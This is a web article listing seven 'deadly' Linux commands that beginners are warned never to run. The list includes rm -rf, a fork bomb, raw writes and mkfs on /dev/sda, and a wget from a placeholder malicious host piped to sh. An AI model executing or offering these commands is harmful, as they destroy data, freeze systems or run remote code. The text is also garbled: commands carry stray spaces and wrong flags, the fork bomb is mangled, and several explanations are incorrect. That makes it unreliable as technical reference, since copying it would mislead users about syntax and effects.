Linux is best-known as an open source operating system in which you can execute Linux commands. If you have no idea what Linux is, Linux OS is very similar to other operating systems you have ever used before like Windows, OS X, or iOS.

However, Linux OS also differs to other operating systems in so many important ways. And if you think you have never used Linux, you are wrong. Basically, between one and two-thirds of webpages on the internet are generated by servers running Linux. So, now you get the idea, right? So, let's go over and see the most deadliest Linux commands.

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Linux Commands: 7 Most Deadly You Should Never Execute On Linux

Linux Commands: 7 Most Deadly You Should Never Execute On Linux
Linux Commands: 7 Most Deadly You Should Never Execute On Linux 
Well, executing commands on Linux is a tough task hence you are required to have the appropriate skills. But because you are on the right page, we are going to discuss the most deadliest commands you should never execute on Linux. So, let's check out the Linux commands given below.

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#1  rm -rf  

This is command is used to delete a specific folder and it's content. When you execute this command carelessly hence with typing errors you will pose unrecoverable damage to the system. There are some commands that work hand in hand with rm command such as Rm-r command which deletes the folder recursively. Also, rm -f command which which removes "only read the file". Moreover, it has the potential to eliminate all files found in the directory.

#2  : () {: |: &} ;: 

The above command is known as the fork bomb command, this commands works by defining a function called ", which is called two times, in the foreground and in the background. The command will keep running until the system freezes.

#3  command> / dev /  sda  

This command writes raw data and all files on the block / dev / sda will be replaced with raw data, resulting in total loss of data in the HDD.

#4  mv directory / dev / null 

The above command transfers all the files to / dev / null. In that case, the command deletes all the files from the system.

#5  wget http: // malicious_source -0  | sh 

This command operates by downloading a script from a malicious source and then run it on your system. The Wget command will download the script and the sh command will run the downloaded script on your system.

#6  Mkfs.ext3 / dev / sda  

This command simply formats the hdd 'sda' and you will definitely know that after running the above command your HDD will be reset to a new one without the data, leaving the system in unrecoverable state.

#7  > File 

This command is used to release the contents of the file. So, when the command is executed with a typo error as "> tx.conf" will write the configuration file or any other system.
We're done. So, those are the deadliest Linux commands that you should never implement. I hope the article was useful.